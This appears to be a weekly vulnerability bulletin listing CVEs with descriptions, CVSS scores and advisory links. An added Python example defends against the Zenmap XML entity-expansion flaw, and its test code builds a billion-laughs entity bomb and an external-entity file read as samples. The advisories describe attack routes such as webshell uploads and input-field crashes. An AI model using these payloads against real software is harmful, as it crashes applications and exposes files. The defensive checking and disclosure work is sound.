| ZenMap--ZenMap | Nmap 7.70 contains a denial of service vulnerability that allows local attackers to crash the application by processing malicious XML files with exponential entity expansion. Attackers can create a crafted XML file with nested entity definitions and open it through ZenMap's scan import functionality to cause the program to consume excessive system resources and crash. | 2026-04-26 | 6.2 | CVE-2018-25282 | ExploitDB-45357 Product Reference VulnCheck Advisory: Nmap 7.70 Denial of Service via XML Entity Expansion |
| Hdtune--HD Tune Pro | HD Tune Pro 5.70 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an excessively long string in the folder/file name field. Attackers can trigger a denial of service by entering a 6000-byte payload through the File > Options > Save dialog's folder/file name input field. | 2026-04-26 | 6.2 | CVE-2018-25284 | ExploitDB-45298 Official Product Homepage Product Reference VulnCheck Advisory: HD Tune Pro 5.70 Denial of Service via Options Dialog |
| Hdtune--Easy PhotoResQ | Easy PhotoResQ 1.0 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Folder/filename field. Attackers can input a 6000-byte payload through the File Options dialog to trigger a denial of service condition. | 2026-04-26 | 6.2 | CVE-2018-25286 | ExploitDB-45300 Official Product Homepage VulnCheck Advisory: Easy PhotoResQ 1.0 Buffer Overflow Denial of Service |
| Editorsoftware--StyleWriter | StyleWriter 1.0 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an excessively long string. Attackers can paste a 6000-byte payload into the Pattern to Find or Advice Message fields in the Add Pattern dialog to trigger a denial of service condition. | 2026-04-26 | 6.2 | CVE-2018-25288 | ExploitDB-45250 Official Product Homepage Product Reference VulnCheck Advisory: StyleWriter 1.0 Denial of Service via Pattern Input |
| Ezbsystems--Softdisk | Softdisk 3.0.3 contains a buffer overflow vulnerability in the registration code dialog that allows local attackers to crash the application by supplying an oversized string. Attackers can trigger the vulnerability by entering a 6000-byte payload in the Registration Name field through the Help menu's Enter Registration Code dialog to cause a denial of service. | 2026-04-26 | 6.2 | CVE-2018-25289 | ExploitDB-45245 Official Product Homepage Product Reference VulnCheck Advisory: Softdisk 3.0.3 Buffer Overflow Denial of Service |
| Ezbsystems--Easyboot | Easyboot 6.6.0 contains a buffer overflow vulnerability in the Replace Text function that allows local attackers to crash the application by supplying an oversized string. Attackers can trigger the vulnerability by accessing File > Tools > Replace Text and pasting a 7000-byte payload into the text fields to cause a denial of service. | 2026-04-26 | 6.2 | CVE-2018-25290 | ExploitDB-45241 Official Product Homepage VulnCheck Advisory: Easyboot 6.6.0 Buffer Overflow Denial of Service |
| Pj64-Emu--Project64 | Project64 2.3.2 contains a buffer overflow vulnerability in the Plugin Directory settings field that allows local attackers to crash the application by supplying an excessively long string. Attackers can input a 6000-byte payload into the Plugin Directory field through the Options > Settings > Directories interface to trigger an application crash when settings are reopened. | 2026-04-26 | 6.2 | CVE-2018-25291 | ExploitDB-45229 Official Product Homepage VulnCheck Advisory: Project64 2.3.2 Denial of Service via Plugin Directory |
| Bome--Restorator | Bome Restorator 1793 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Name field. Attackers can create a malicious payload exceeding 4000 bytes and paste it into the Name input field to trigger an application crash and denial of service. | 2026-04-26 | 6.2 | CVE-2018-25292 | ExploitDB-45223 Official Product Homepage Product Reference VulnCheck Advisory: Bome Restorator 1793 Denial of Service via Buffer Overflow |
| Mersenne--Prime95 | Prime95 29.4b7 contains a buffer overflow vulnerability in the PrimeNet connection dialog that allows local attackers to crash the application by supplying an excessively long string in the optional proxy password field. Attackers can trigger a denial of service by entering a 6000-byte payload into the proxy password parameter, causing the application to crash when processing the connection settings. | 2026-04-26 | 6.2 | CVE-2018-25293 | ExploitDB-45226 Official Product Homepage Product Reference VulnCheck Advisory: Prime95 29.4b7 Denial of Service via Proxy Password Field |
| P10--ObserverIP Scan Tool | ObserverIP Scan Tool 1.4.0.1 contains a denial of service vulnerability that allows local attackers to crash the application by submitting an excessively long string in the IP input field. Attackers can paste a 2000-byte buffer of repeated characters into the IP field and trigger a search operation to cause an application crash. | 2026-04-26 | 6.2 | CVE-2018-25295 | ExploitDB-45204 Official Product Homepage Product Reference VulnCheck Advisory: ObserverIP Scan Tool 1.4.0.1 Denial of Service via IP Field |
| Wansview--Wansview | Wansview 1.0.2 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying oversized input strings. Attackers can inject 2000-byte payloads into the Camera name and DID number fields during camera addition to trigger application crashes. | 2026-04-26 | 6.2 | CVE-2018-25297 | ExploitDB-45194 VulnCheck Advisory: Wansview 1.0.2 Denial of Service via Buffer Overflow |
| 94Cb--Carbon Forum | Carbon Forum 5.9.0 contains a persistent cross-site scripting vulnerability that allows authenticated administrators to inject malicious JavaScript code through the Forum Name field in dashboard settings. Attackers with admin privileges can store JavaScript payloads in the Forum Name field that execute in the browsers of all users visiting the forum, enabling session hijacking and data theft. | 2026-04-22 | 6.4 | CVE-2024-58344 | ExploitDB-52043 Official Product Homepage Product Reference VulnCheck Advisory: Carbon Forum 5.9.0 Persistent XSS via Forum Name Field |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 10.6 before 18.9.6, 18.10 before 18.10.4, and 18.11 before 18.11.1 that could have allowed an authenticated user to cause denial of service under certain conditions by exhausting server resources by making crafted requests to a discussions endpoint. | 2026-04-22 | 6.5 | CVE-2025-0186 | HackerOne Bug Bounty Report #2915694 https://gitlab.com/gitlab-org/gitlab/-/work_items/511312 https://about.gitlab.com/releases/2026/04/22/patch-release-gitlab-18-11-1-released/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 12.4 before 18.9.6, 18.10 before 18.10.4, and 18.11 before 18.11.1 that could have allowed an authenticated user to cause denial of service by overwhelming system resources under certain conditions due to insufficient resource allocation limits in the GraphQL API. | 2026-04-22 | 6.5 | CVE-2025-3922 | HackerOne Bug Bounty Report #3098035 https://gitlab.com/gitlab-org/gitlab/-/work_items/537422 https://about.gitlab.com/releases/2026/04/22/patch-release-gitlab-18-11-1-released/ |
| Picajet--RoboImport | RoboImport 1.2.0.72 contains a denial of service vulnerability that allows local attackers to crash the application by submitting oversized input to registration fields. Attackers can paste a 6000-byte buffer into the Registration Name and Registration Key fields and click Register to trigger an application crash. | 2026-04-26 | 5.5 | CVE-2018-25276 | ExploitDB-45382 Product Reference VulnCheck Advisory: RoboImport 1.2.0.72 Denial of Service via Registration Fields |
| Infiltration-Systems--Infiltrator Network Security Scanner | Infiltrator Network Security Scanner 4.6 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an oversized input string. Attackers can paste a 6000-byte payload into the Scan Target field and trigger a denial of service condition when the Scan button is clicked. | 2026-04-26 | 5.5 | CVE-2018-25280 | ExploitDB-45390 Product Reference VulnCheck Advisory: Infiltrator Network Security Scanner 4.6 Denial of Service |
| Maxprog--iCash | iCash 7.6.5 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an oversized payload through the Connect to Server dialog. Attackers can paste a 7000-byte string into the Host field and click Connect to trigger an application crash. | 2026-04-26 | 5.5 | CVE-2018-25281 | ExploitDB-45388 VulnCheck Advisory: iCash 7.6.5 Denial of Service via Connect to Server |
| Fathom--Fathom | Fathom 2.4 contains a buffer overflow vulnerability in the Authorization Code field that allows local attackers to crash the application by submitting an oversized input string. Attackers can paste a 6000-byte payload into the Authorization Code field and click Activate to trigger a denial of service condition. | 2026-04-26 | 5.5 | CVE-2018-25285 | ExploitDB-45294 Official Product Homepage Product Reference VulnCheck Advisory: Fathom 2.4 Denial of Service via Authorization Code Buffer Overflow |
| Hdtune--Drive Power Manager | Drive Power Manager 1.10 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Name field. Attackers can paste a 6000-byte payload into the Name field and click Register to trigger a denial of service condition. | 2026-04-26 | 5.5 | CVE-2018-25287 | ExploitDB-45299 Official Product Homepage VulnCheck Advisory: Drive Power Manager 1.10 Denial of Service via Name Field |
| P10--Central Management Software | P10 Central Management Software 1.4.13 contains a buffer overflow vulnerability in the login password field that allows local attackers to crash the application by submitting an oversized input string. Attackers can paste a 2000-byte payload into the password field and click login to trigger an application crash and denial of service. | 2026-04-26 | 5.5 | CVE-2018-25296 | ExploitDB-45207 Official Product Homepage VulnCheck Advisory: P10 Central Management Software 1.4.13 Denial of Service |
| Fortra--GoAnywhere MFT | Encrypted values in Fortra's GoAnywhere MFT prior to version 7.10.0 and GoAnywhere Agents prior to version 2.2.0 utilize a static IV which allows admin users to brute-force decryption of data. | 2026-04-21 | 5.8 | CVE-2025-1241 | https://fortra.com/security/advisories/product-security/FI-2026-001 |
| OpenSC--OpenSC | Multiple uses of uninitialized variables were found in libopensc that may lead to information disclosure or application crash. An attack requires a crafted USB device or smart card that presents the system with specially crafted responses to the APDUs. | 2026-04-23 | 5.7 | CVE-2025-13763 | https://access.redhat.com/security/cve/CVE-2025-13763 RHBZ#2417581 https://github.com/OpenSC/OpenSC/security/advisories/GHSA-2v44-fq35-98vv https://github.com/OpenSC/OpenSC/wiki/CVE-2025-13763 |
| HCLSoftware--BigFix Service Management (SM) | HCL BigFix Service Management (SM) Discovery is vulnerable to unenforced encryption due to port 80 (HTTP) being open, allowing unencrypted access. An attacker with access to the network traffic can sniff packets from the connection and uncover the data. | 2026-04-21 | 5.3 | CVE-2025-31981 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127605 |
| IBM--Security Verify Directory (Container) | IBM Security Verify Directory (Container) 10.0.0 through 10.0.0.3 could be vulnerable to malicious file upload by not validating file type. A privileged user could upload malicious files into the system that can be sent to victims for performing further attacks against the system. | 2026-04-22 | 5.5 | CVE-2025-36074 | https://www.ibm.com/support/pages/node/7268907 |
| hubspotdev--HubSpot All-In-One Marketing Forms, Popups, Live Chat | The HubSpot All-In-One Marketing - Forms, Popups, Live Chat plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 11.3.32 via the leadin/public/admin/class-adminconstants.php file. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract a list of all installed plugins and their versions which can be leveraged for reconnaissance and further attacks. | 2026-04-24 | 4.3 | CVE-2025-11762 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2a8c62e6-f459-433a-b0c4-c79285ea7fe9?source=cve https://research.cleantalk.org/CVE-2025-11762 https://plugins.trac.wordpress.org/browser/leadin/tags/11.3.33/public/admin/class-adminconstants.php |
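
The Zenmap entry above (CVE-2018-25282) is the classic exponential entity expansion: a handful of nested entity declarations in the DOCTYPE expand to megabytes the moment the parser resolves them. The Python below is an added example, not Nmap or Zenmap code: it uses the standard library's expat bindings to read only the DOCTYPE, estimates the expanded size of each internal entity from the sizes of the entities it references, and rejects the file before any expansion happens. It also refuses external entities, which goes beyond the entry (the same pre-parse walk covers both). The sample scan files, entity names and limits are constructed for the example.

```python
"""Budgeting DTD entity expansion before any entity is expanded.

Added example, not Nmap/Zenmap code. Only the DOCTYPE of the document is
walked with expat; parsing is aborted at the end of the DOCTYPE, so the
element content (where the expansion would happen) is never touched.
Sample documents and limits are made up.
"""
import re
import xml.parsers.expat

ENTITY_REF = re.compile(r"&([A-Za-z_][\w.-]*);")


class _StopParsing(Exception):
    """Raised from a handler to abort expat once we have what we need."""


def estimate_expansion(value: str, sizes: dict) -> int:
    """Expanded length of an entity value, given the sizes of earlier entities.

    References to unknown or predefined entities (&amp; ...) are counted at
    their literal length, which slightly over-estimates and is therefore safe.
    """
    total, last = 0, 0
    for m in ENTITY_REF.finditer(value):
        total += m.start() - last + sizes.get(m.group(1), len(m.group(0)))
        last = m.end()
    return total + len(value) - last


def check_xml_entities(doc: bytes, max_expansion: int = 10_000, max_entities: int = 50):
    """Return a list of violations; an empty list means the DTD is within budget."""
    sizes, violations = {}, []

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if value is None:                       # external entity: never fetch it
            violations.append(f"external entity {name!r}: {system_id!r}")
            sizes[name] = 0
        else:
            sizes[name] = estimate_expansion(value, sizes)
            if sizes[name] > max_expansion:
                violations.append(f"entity {name!r} expands to ~{sizes[name]} bytes")
        if len(sizes) > max_entities:
            violations.append(f"more than {max_entities} entities declared")
        if violations:
            raise _StopParsing

    def on_doctype_end():
        raise _StopParsing                      # DTD done; do not parse content

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity
    parser.EndDoctypeDeclHandler = on_doctype_end
    try:
        parser.Parse(doc, True)
    except _StopParsing:
        pass
    except xml.parsers.expat.ExpatError as exc:
        violations.append(f"malformed XML: {exc}")
    return violations


def billion_laughs(depth: int = 4, fanout: int = 10) -> bytes:
    """Constructed Zenmap-style scan file carrying a nested-entity bomb."""
    decls = ['<!ENTITY lol "lol">']
    for i in range(1, depth + 1):
        prev = "lol" if i == 1 else f"lol{i - 1}"
        decls.append(f'<!ENTITY lol{i} "{("&" + prev + ";") * fanout}">')
    dtd = "\n ".join(decls)
    return (f'<?xml version="1.0"?>\n<!DOCTYPE nmaprun [\n {dtd}\n]>\n'
            f'<nmaprun>&lol{depth};</nmaprun>').encode()


# Constructed samples: a harmless internal entity, no DTD at all, and an
# external entity pointing at a local file (made-up path).
BENIGN = b'<?xml version="1.0"?>\n<!DOCTYPE nmaprun [ <!ENTITY scanner "nmap"> ]>\n<nmaprun scanner="&scanner;"/>'
NO_DTD = b'<?xml version="1.0"?>\n<nmaprun scanner="nmap"/>'
EXTERNAL = b'<?xml version="1.0"?>\n<!DOCTYPE nmaprun [ <!ENTITY ext SYSTEM "file:///tmp/hostname"> ]>\n<nmaprun>&ext;</nmaprun>'

if __name__ == "__main__":
    for label, sample in [("benign", BENIGN), ("no DTD", NO_DTD),
                          ("external", EXTERNAL), ("bomb", billion_laughs())]:
        print(f"{label:9s} -> {check_xml_entities(sample) or 'ok'}")
```

Because parsing is aborted at the end of the DOCTYPE, the check costs time linear in the size of the DTD no matter how large the expansion would be; a caller that wants the content afterwards parses the document a second time only when the check returns no violations. The estimate is an upper bound on the expanded text, so a 10,000-byte budget is generous for a real scan file and still rejects four nesting levels of ten-fold fan-out.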

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| HCLSoftware--BigFix Service Management (SM) | HCL BigFix Service Management is susceptible to HTTP Request Smuggling. HTTP request smuggling vulnerabilities arise when websites route HTTP requests through web servers with inconsistent HTTP parsing. HTTP Smuggling exploits inconsistencies in request parsing between front-end and back-end servers, allowing attackers to bypass security controls and perform attacks like cache poisoning or request hijacking. | 2026-04-21 | 3.7 | CVE-2025-31958 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124209 |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| NWCLARK--Storable | Storable versions before 3.05 for Perl have a stack overflow. The retrieve_hook function stored the length of the class name in a signed integer but treated the length as unsigned in read operations. This allowed an attacker to craft data that could trigger the overflow. | 2026-04-21 | not yet calculated | CVE-2017-20230 | https://github.com/Perl/perl5/issues/15831 https://github.com/Perl/perl5/commit/a258c17c6937f79529c8319a829310e09cdbd216.patch https://metacpan.org/release/RURBAN/Storable-3.05/changes https://www.nntp.perl.org/group/perl.perl5.porters/2017/01/msg242533.html https://www.nntp.perl.org/group/perl.perl5.porters/2017/01/msg242703.html |
| Seeyon Internet Software--A8-V5 Collaborative Management Software | Seeyon OA A8 contains an unauthenticated arbitrary file write vulnerability in the /seeyon/htmlofficeservlet endpoint that allows remote attackers to write arbitrary files to the web application root by sending specially crafted POST requests with custom base64-encoded payloads. Attackers can write JSP webshells to the web root and execute them through the web server to achieve arbitrary OS command execution with web server privileges. Exploitation evidence was first observed by the Shadowserver Foundation on 2021-03-26 (UTC). | 2026-04-21 | not yet calculated | CVE-2019-25714 | https://sourceforge.net/software/product/A8/ https://web.archive.org/web/20190821034711/http://wyb0.com/posts/2019/seeyon-htmlofficeservlet-getshell/ https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/%E8%87%B4%E8%BF%9Coa/%E8%87%B4%E8%BF%9C%20OA%20A8%20htmlofficeservlet%20getshell%20%E6%BC%8F%E6%B4%9E/ https://static-aliyun-doc.oss-cn-hangzhou.aliyuncs.com/download/pdf/90916/Security_Notification_reseller_en-US.pdf https://www.broadcom.com/support/security-center/attacksignatures/detail?asid=31713 https://www.fortiguard.com/encyclopedia/ips/48874/seeyon-office-anywhere-htmlofficeservlet-arbitrary-file-upload https://www.vulncheck.com/advisories/seeyon-office-anywhere-oa-a8-unauthenticated-arbitrary-file-write-via-htmlofficeservlet |
| Unknown--Email Encoder | The Email Encoder WordPress plugin before 2.3.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2026-04-20 | not yet calculated | CVE-2024-7083 | https://wpscan.com/vulnerability/7aeb6891-e159-4ed8-b1a9-a551140c9fcc/ |
| Semantic MediaWiki--Semantic MediaWiki | Reflected Cross-Site Scripting (XSS) vulnerability in Semantic MediaWiki. This vulnerability allows an attacker to execute JavaScript code in the victim's browser by sending them a malicious URL that uses the '/index.php/Speciaal:GefacetteerdZoeken' endpoint parameter. This vulnerability can be exploited to steal sensitive user data, such as session cookies, or to perform actions on behalf of the user. | 2026-04-21 | not yet calculated | CVE-2025-10354 | https://www.incibe.es/en/incibe-cert/notices/aviso/reflected-cross-site-scripting-xss-semantic-mediawiki |
| EfficientLab, LLC--Controlio | EfficientLab Controlio before v1.3.95 contains a DLL hijacking vulnerability caused by weak folder permissions in the installation directory. A local attacker can place a specially crafted DLL in this directory and achieve arbitrary code execution with highest privileges, because the affected service runs as NT AUTHORITY\SYSTEM. | 2026-04-23 | not yet calculated | CVE-2025-10549 | https://r.sec-consult.com/controlio https://kb.controlio.net/hc/en-us/articles/45777908471185-Client-Update-April-15-2026-ver-1-3-95 |
| Fudo Security--Fudo Enterprise | Fudo Enterprise in versions from 5.5.0 through 5.6.2 allows low privileged users to access certain administrator-only resources via improperly protected API endpoints. This includes sensitive information such as system logs and parts of system configuration settings. This vulnerability has been fixed in version 5.6.3 | 2026-04-20 | not yet calculated | CVE-2025-13480 | https://www.fudosecurity.com/product/enterprise https://cert.pl/en/posts/2026/04/CVE-2025-13480 https://download.fudosecurity.com/documentation/fudo/5_6/rn/RN_5.6.3.pdf |
| Zervit--portable HTTP/Web server | Zervit's portable HTTP/web server is vulnerable to remote DoS attacks when a configuration reset request is made. The vulnerability is caused by inadequate validation of user-supplied input. An attacker can exploit this vulnerability by sending malicious requests. If the vulnerability is successfully exploited, the application can be made to stop responding, resulting in a DoS condition. It is possible to manually restart the application. | 2026-04-21 | not yet calculated | CVE-2025-13826 | https://www.incibe.es/en/incibe-cert/notices/aviso/incorrect-input-validation-zervit-portable-httpweb-server |
| ATRODO--Net:Dropbear | Net:Dropbear versions before 0.14 for Perl contain a vulnerable version of libtomcrypt. Net:Dropbear versions before 0.14 include versions of Dropbear 2019.78 or earlier. These include versions of libtomcrypt v1.18.1 or earlier, which are affected by CVE-2016-6129 and CVE-2018-12437. | 2026-04-21 | not yet calculated | CVE-2025-15638 | https://www.cve.org/CVERecord?id=CVE-2016-6129 https://www.cve.org/CVERecord?id=CVE-2018-12437 https://metacpan.org/release/ATRODO/Net-Dropbear-0.14/source/dropbear/libtomcrypt/changes |
| PHP Point Of Sale--PHP Point Of Sale | HTML injection vulnerability in PHP Point of Sale v19.4. This vulnerability allows an attacker to render HTML in the victim's browser due to a lack of proper validation of user input by sending a request to '/reports/generate/specific_customer' using the 'start_date_formatted' and 'end_date_formatted' parameters. | 2026-04-21 | not yet calculated | CVE-2025-41011 | https://www.incibe.es/en/incibe-cert/notices/aviso/html-injection-php-point-sale-0 |
| Zeon Global Tech--Zeon Academy Pro | SQL injection vulnerability in Zeon Academy Pro by Zeon Global Tech. This vulnerability allows an attacker to retrieve, create, update, and delete databases by sending a POST request using the parameter 'phonenumber' in '/private/continue-upload.php'. | 2026-04-21 | not yet calculated | CVE-2025-41029 | https://www.incibe.es/en/incibe-cert/notices/aviso/sql-injection-zeon-academy-pro-zeon-global-tech |
Vulnerability Summary for the Week of April 13, 2026
Posted on Tuesday April 21, 2026

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Grafana--Pyroscope | Pyroscope is an open-source continuous profiling database. The database supports various storage backends, including Tencent Cloud Object Storage (COS). If the database is configured to use Tencent COS as the storage backend, an attacker could extract the secret_key configuration value from the Pyroscope API. To exploit this vulnerability, an attacker needs direct access to the Pyroscope API. We highly recommend limiting the public internet exposure of all our databases, such that they are only accessible by trusted users or internal systems. This vulnerability is fixed in versions: 1.15.x: 1.15.2 and above. 1.16.x: 1.16.1 and above. 1.17.x: 1.17.0 and above (i.e. all versions). Thanks to Théo Cusnir for reporting this vulnerability to us via our bug bounty program. | 2026-04-15 | 9.1 | CVE-2025-41118 | https://grafana.com/security/security-advisories/cve-2025-41118 |
| n/a--Grocery Store Management System v1.0 | Improper input handling in /Grocery/search_products_itname.php, in anirudhkannan Grocery Store Management System 1.0, allows SQL injection via the sitem_name POST parameter. | 2026-04-14 | 9.8 | CVE-2025-63939 | https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2025-63939 |
| n/a--manikandan580 School-management-system v1.0 | In manikandan580 School-management-system 1.0, a time-based blind SQL injection vulnerability exists in /studentms/admin/between-date-reprtsdetails.php through the fromdate POST parameter. | 2026-04-14 | 9.8 | CVE-2025-65135 | https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2025-65135 |
| Owen--WebStack | The WebStack theme for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the io_img_upload() function in all versions up to, and including, 1.2024. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2026-04-15 | 9.8 | CVE-2026-1555 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b97805de-1b47-4c9f-baae-2e37c1b78570?source=cve https://github.com/owen0o0/WebStack/blob/master/inc/ajax.php#L5 https://github.com/owen0o0/WebStack/tree/master |
| Cisco--Cisco Identity Services Engine Software | A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device. To exploit this vulnerability, the attacker must have valid administrative credentials. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to obtain user-level access to the underlying operating system and then elevate privileges to root. In single-node ISE deployments, successful exploitation of this vulnerability could cause the affected ISE node to become unavailable, resulting in a denial of service (DoS) condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored. | 2026-04-15 | 9.9 | CVE-2026-20147 | cisco-sa-ise-rce-traversal-8bYndVrZ |
| Cisco--Cisco Identity Services Engine Software | A vulnerability in Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device. To exploit this vulnerability, the attacker must have at least Read Only Admin credentials. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to obtain user-level access to the underlying operating system and then elevate privileges to root. In single-node ISE deployments, successful exploitation of these vulnerabilities could cause the affected ISE node to become unavailable, resulting in a denial of service (DoS) condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored. | 2026-04-15 | 9.9 | CVE-2026-20180 | cisco-sa-ise-rce-4fverepv |
| Cisco--Cisco Webex Meetings | A vulnerability in the integration of single sign-on (SSO) with Control Hub in Cisco Webex Services could have allowed an unauthenticated, remote attacker to impersonate any user within the service. This vulnerability existed because of improper certificate validation. Prior to this vulnerability being addressed, an attacker could have exploited this vulnerability by connecting to a service endpoint and supplying a crafted token. A successful exploit could have allowed the attacker to gain unauthorized access to legitimate Cisco Webex services. | 2026-04-15 | 9.8 | CVE-2026-20184 | cisco-sa-webex-cui-cert-8jSZYhWL |
| Cisco--Cisco Identity Services Engine Software | A vulnerability in Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device. To exploit this vulnerability, the attacker must have at least Read Only Admin credentials. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to obtain user-level access to the underlying operating system and then elevate privileges to root. In single-node ISE deployments, successful exploitation of these vulnerabilities could cause the affected ISE node to become unavailable, resulting in a denial of service (DoS) condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored. | 2026-04-15 | 9.9 | CVE-2026-20186 | cisco-sa-ise-rce-4fverepv |
| Ubiquiti Inc--UniFi Play PowerAmp | A malicious actor with access to the UniFi Play network could exploit a Path Traversal vulnerability found in the device firmware to write files on the system that could be used for a remote code execution (RCE). Affected Products: UniFi Play PowerAmp (Version 1.0.35 and earlier) UniFi Play Audio Port (Version 1.0.24 and earlier) Mitigation: Update UniFi Play PowerAmp to Version 1.0.38 or later Update UniFi Play Audio Port to Version 1.1.9 or later | 2026-04-13 | 9.8 | CVE-2026-22562 | https://community.ui.com/releases/Security-Advisory-Bulletin-063/e468dd4b-5090-4ef8-89d8-939903c08e83 |
| Ubiquiti Inc--UniFi Play PowerAmp | A series of Improper Input Validation vulnerabilities could allow a Command Injection by a malicious actor with access to the UniFi Play network. Affected Products: UniFi Play PowerAmp (Version 1.0.35 and earlier) UniFi Play Audio Port (Version 1.0.24 and earlier) Mitigation: Update UniFi Play PowerAmp to Version 1.0.38 or later Update UniFi Play Audio Port to Version 1.1.9 or later | 2026-04-13 | 9.8 | CVE-2026-22563 | https://community.ui.com/releases/Security-Advisory-Bulletin-063/e468dd4b-5090-4ef8-89d8-939903c08e83 |
| Ubiquiti Inc--UniFi Play PowerAmp | An Improper Access Control vulnerability could allow a malicious actor with access to the UniFi Play network to enable SSH to make unauthorized changes to the system. Affected Products: UniFi Play PowerAmp (Version 1.0.35 and earlier) UniFi Play Audio Port (Version 1.0.24 and earlier) Mitigation: Update UniFi Play PowerAmp to Version 1.0.38 or later Update UniFi Play Audio Port to Version 1.1.9 or later | 2026-04-13 | 9.8 | CVE-2026-22564 | https://community.ui.com/releases/Security-Advisory-Bulletin-063/e468dd4b-5090-4ef8-89d8-939903c08e83 |
| Festo--MSE6-C2M-5000-FB36-D-M-RG-BAR-M12L4-AGD | In products of the MSE6 product-family by Festo a remote authenticated, low privileged attacker could use functions of undocumented test mode which could lead to a complete loss of confidentiality, integrity and availability. | 2026-04-16 | 8.8 | CVE-2023-3634 | https://certvde.com/de/advisories/VDE-2023-020/ https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2023/fsa-202304.json |
| shahinurislam--Career Section | The Career Section plugin for WordPress is vulnerable to Cross-Site Request Forgery leading to Path Traversal and Arbitrary File Deletion in all versions up to, and including, 1.6. This is due to missing nonce validation and insufficient file path validation on the delete action in the 'appform_options_page_html' function. This makes it possible for unauthenticated attackers to delete arbitrary files on the server via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-04-16 | 8.8 | CVE-2025-14868 | https://www.wordfence.com/threat-intel/vulnerabilities/id/84936b68-923a-4da1-ae67-1d63d025342e?source=cve https://plugins.trac.wordpress.org/changeset/3474216/career-section |
| Nozomi Networks--Guardian | An access control vulnerability was discovered in the Threat Intelligence functionality due to a specific access restriction not being properly enforced for users with view-only privileges. An authenticated user with view-only privileges for the Threat Intelligence functionality can perform administrative actions on it, altering the rules configuration, and/or affecting their availability. | 2026-04-15 | 8.1 | CVE-2025-40897 | https://security.nozominetworks.com/NN-2026:1-01 |
| Nozomi Networks--Guardian | A Stored Cross-Site Scripting vulnerability was discovered in the Assets and Nodes functionality due to improper validation of an input parameter. An authenticated user with custom fields privileges can define a malicious custom field containing a JavaScript payload. When the victim views the Assets or Nodes pages, the XSS executes in their browser context, allowing the attacker to perform unauthorized actions as the victim, such as modify application data, disrupt application availability, and access limited sensitive information. | 2026-04-15 | 8.9 | CVE-2025-40899 | https://security.nozominetworks.com/NN-2026:2-01 |
| livemesh--Livemesh Addons by Elementor | The Livemesh Addons for Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 9.0. This is due to insufficient sanitization of the template name parameter in the `lae_get_template_part()` function, which uses an inadequate `str_replace()` approach that can be bypassed using recursive directory traversal patterns. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the attacker to include and execute local files via the widget's template parameter granted they can trick an administrator into performing an action or install Elementor. | 2026-04-16 | 8.8 | CVE-2026-1620 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2483875a-84de-4a40-a69e-aee68da1ce3b?source=cve https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/includes/helper-functions.php#L669 https://plugins.trac.wordpress.org/browser/addons-for-elementor/tags/9.0/includes/helper-functions.php#L669 https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/includes/helper-functions.php#L671 https://plugins.trac.wordpress.org/browser/addons-for-elementor/tags/9.0/includes/helper-functions.php#L671 |
| Cloud Foundry--UAA | Cloud Foundry UAA is vulnerable to a bypass that allows an attacker to obtain a token for any user and gain access to UAA-protected systems. This vulnerability exists when SAML 2.0 bearer assertions are enabled for a client, as the UAA accepts SAML 2.0 bearer assertions that are neither signed nor encrypted. This issue affects UAA from v77.30.0 to v78.7.0 (inclusive) and it affects CF Deployment from v48.7.0 to v54.14.0 (inclusive). | 2026-04-16 | 8.6 | CVE-2026-22734 | https://www.cloudfoundry.org/blog/cve-2026-22734-uaa-saml-2-0-signature-bypass/ |
